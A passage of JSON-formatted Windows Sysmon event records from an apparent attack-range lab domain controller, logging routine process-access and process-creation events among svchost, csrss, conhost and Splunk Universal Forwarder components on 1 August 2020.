C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21A4-5F25-0000-0010229F0900}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21A4-5F25-0000-0010229F0900}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.195\r\nSourceProcessGUID: {41C8662E-21A4-5F25-0000-0010229F0900}\r\nSourceProcessId: 2232\r\nSourceThreadId: 3408\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.195","SourceProcessGUID":"{41C8662E-21A4-5F25-0000-0010229F0900}","SourceProcessId":"2232","SourceThreadId":"3408","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nProcessGuid: {41C8662E-21A4-5F25-0000-0010D9A00900}\r\nProcessId: 4624\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","ProcessGuid":"{41C8662E-21A4-5F25-0000-0010D9A00900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21A4-5F25-0000-0010D9A00900}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21A4-5F25-0000-0010D9A00900}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A4-5F25-0000-0010D9A00900}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A4-5F25-0000-0010D9A00900}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: 